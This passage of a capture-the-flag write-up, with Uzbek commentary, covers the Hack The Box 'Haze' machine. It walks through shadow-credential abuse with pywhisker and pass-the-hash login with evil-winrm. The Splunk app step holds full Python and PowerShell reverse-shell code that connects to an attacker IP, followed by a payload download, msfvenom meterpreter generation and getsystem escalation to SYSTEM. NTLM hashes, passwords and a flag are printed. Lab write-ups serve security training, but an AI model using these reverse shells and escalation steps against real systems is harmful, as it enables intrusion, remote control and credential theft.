/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'

Haze 15
 'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250329-180435.bak

[*] DACL modified successfully!

pywhisker.py dan foydalanamiz

https://github.com/ShutdownRepo/pywhisker

┌──(venv)─(kali ㉿kali)-[~/…/HTB/Haze/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02
c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential

Haze 16
 [*] KeyCredential generated with DeviceID: 4723e9b1-4a37-1172-fb9d-d1eb66df2975
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: RiINBkUx.pfx
[+] PFX exportiert nach: RiINBkUx.pfx
[i] Passwort für PFX: SShOyHNfLs34SAgndFjj
[+] Saved PFX (#PKCS12) certificate & key at path: RiINBkUx.pfx
[*] Must be used with password: SShOyHNfLs34SAgndFjj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

┌──(venv)─(kali ㉿kali)-[~/…/HTB/Haze/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02
c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "info" --device-id 4723e9b1-4a37-1172-fb9d-d1
eb66df2975
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[+] Found device Id
<KeyCredential structure at 0x7faa2d64e0f0>
| Owner: CN=Edward Martin,CN=Users,DC=haze,DC=htb
| Version: 0x200
| KeyID: IviFPb/wwdUh53UH+fGdwoGInRQ48tTRprA4O/gv2nA=
| KeyHash: 6a97ce5142c80bb23afc87e9af501a486cca84ca457977d2bbed64849e1bb8b5
| RawKeyMaterial: <dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7faa2d64db50
>
| | Exponent (E): 65537
| | Modulus (N): 0xea83eecdb7e534d288ec9ac838b098da752a3ca49fb57df7e16973925250fe6dedee041e457d2
4ab776733dc4af0bf8d3e26a76e8a7f50427ac7cec99eeb685ecff8ccc97d3ce8d42db1ec1d13515e9427773e9495a6
2ffc5570d35c5d7e0ccc2019b8dfbb64c3955467a515eb2386bf5db3a0605113f9510d39308f648b64a5505baa933d
df929359b21bc708a24b2c01dc26e7543f3dd2c2f56fdc3e78325e9106a1fb2888268d0edd86eb7e7204ecbeea4c41
56963bed45ca348a87412999ff2beb4c8824daec22d89051b4591981fdf144b59ef6162d4499ca774ea3c818b698cf5
aa1c20b141fbc61ecbf014f5c294268e04c422b54d2cac42ebe022565
| | Prime1 (P): 0x0
| | Prime2 (Q): 0x0
| Usage: KeyUsage.NGC
| LegacyUsage: None
| Source: KeySource.AD
| DeviceId: 4723e9b1-4a37-1172-fb9d-d1eb66df2975
| CustomKeyInfo: <CustomKeyInformation at 0x7faa2d65d590>
| | Version: 1
| | Flags: KeyFlags.NONE
| | VolumeType: None
| | SupportsNotification: None
| | FekKeyVersion: None
| | Strength: None
| | Reserved: None
| | EncodedExtendedCKI: None
| LastLogonTime (UTC): 2025-03-29 22:34:05.059959
| CreationTime (UTC): 2025-03-29 22:34:05.059959

1. Sertifikat yaratish ( add action)

python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02c6b2

Haze 17
 dc54c3c8c6891f55279ebc" --target "edward.martin" --action "add"

Nimani qilayapti?
d haze.htb : Domain ( haze.htb ) ni belgiladik.

u "Haze-IT-Backup$" : Windows Active Directory tizimida xizmat hisob raqami yoki kompyuter hisob raqami (bu yerda
Haze-IT-Backup$ ) ni ishlatdik

H "0926...:735c..." : NTLM Hash'larni ko‘rsatdik.

-target "edward.martin" : Maqsadli foydalanuvchi ( edward.martin ) hisobiga hujum qilmoqdamiz.

-action "add" : Ushbu amal edward.martin hisobiga yangi KeyCredential (kalit) qo‘shadi.

Natija:
Siz Edward Martin foydalanuvchisiga yangi KeyCredential qo‘shdik.

RiINBkUx.pfx nomli sertifikat yaratildi, parol esa SShOyHNfLs34SAgndFjj .

Ushbu sertifikat bilan PKINITtools yordamida Kerberos TGT olish mumkin.

2. Ma'lumotlarni ko‘rish ( info action)

python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02c6b2

dc54c3c8c6891f55279ebc" --target "edward.martin" --action "info" --device-id 4723e9b1-4a37-1172-fb9d-d1eb66
df2975

Nimani qilayapti?
-action "info" : Maqsadli foydalanuvchining KeyCredential ma'lumotlarini ko‘rish uchun ishlatiladi.

-device-id ... : Siz KeyCredential ga tegishli Device ID ni ko‘rsatyapsiz.

Natija:
Sizga KeyCredential haqida ko‘p ma'lumotlar ko‘rsatilmoqda, jumladan:

Owner : Edward Martin (bu KeyCredential unga tegishli).

KeyID : Kalitning unikal identifikatori.

KeyHash : Hashlangan kalit.

RawKeyMaterial : Kalitning xom ma'lumoti (RSA kalitlar).

DeviceId : Siz ko‘rsatgan Device ID .

LastLogonTime : So‘nggi marta tizimga kirish vaqti.

CreationTime : KeyCredential yaratilgan vaqti.

evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'

Haze 18
 Privilage Escalation (Huquqlarni oshirish)

https://github.com/0xjpuff/reverse_shell_splunk

Yuklab olamiz va

㉿
┌──(kali kali)-[~/Desktop/reverse_shell_splunk/reverse_shell_splunk/bin]
└─$ cat rev.py
import sys,socket,os,pty

ip="10.10.14.x"
port=4444
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk/reverse_shell_splunk/bin]
└─$ cat run.ps1
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments a
s well.
#$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetS
tream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-
Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String
);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback
2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.x',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()

Haze 19
 };
$client.Close()

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
reverse_shell_splunk/
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/run.bat
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$
total 20
-rw-rw-r-- 1 kali kali 1810 Mar 29 23:48 README.md
drwxrwxr-x 4 kali kali 4096 Mar 29 23:48 reverse_shell_splunk
-rw-rw-r-- 1 kali kali 1034 Mar 30 00:40 reverse_shell_splunk.spl

user: admin
password
: Sp1unkadmin@2k24

ichiga kirgandan keyin app > manage > install app from file. keyin reverse_shell_splunk.spl upload qilamiz

Haze 20
 ┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.198] from (UNKNOWN) [10.10.11.61] 51701

PS C:\Windows\system32> whoami
haze\alexander.green
PS C:\Windows\system32> iwr http://10.10.14.x:8000/shell.exe -OutFile C:\users\public\shell.exe

=======================================================================

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.x LPORT=5555 -f exe -o shell.exe

PS C:\users\public> ./shell.exe
==================================================================================
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.x
LHOST => 10.10.14.x
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.x:5555
[*] Sending stage (203846 bytes) to 10.10.11.61
[*] Meterpreter session 1 opened (10.10.14.x:5555 -> 10.10.11.61:51754) at 2025-03-30 00:49:33 -0400

meterpreter >
meterpreter > getsystem

...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).

meterpreter >
meterpreter > shell
Process 4144 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.3328]

Haze 21
 (c) Microsoft Corporation. All rights reserved.

C:\users\public>whoami
whoami
nt authority\system

C:\users\public>cd ../administrator/desktop
cd ../administrator/desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
900dc84bcaed8c08c3aac7ad55e86ed9

C:\Users\Administrator\Desktop>

Haze 22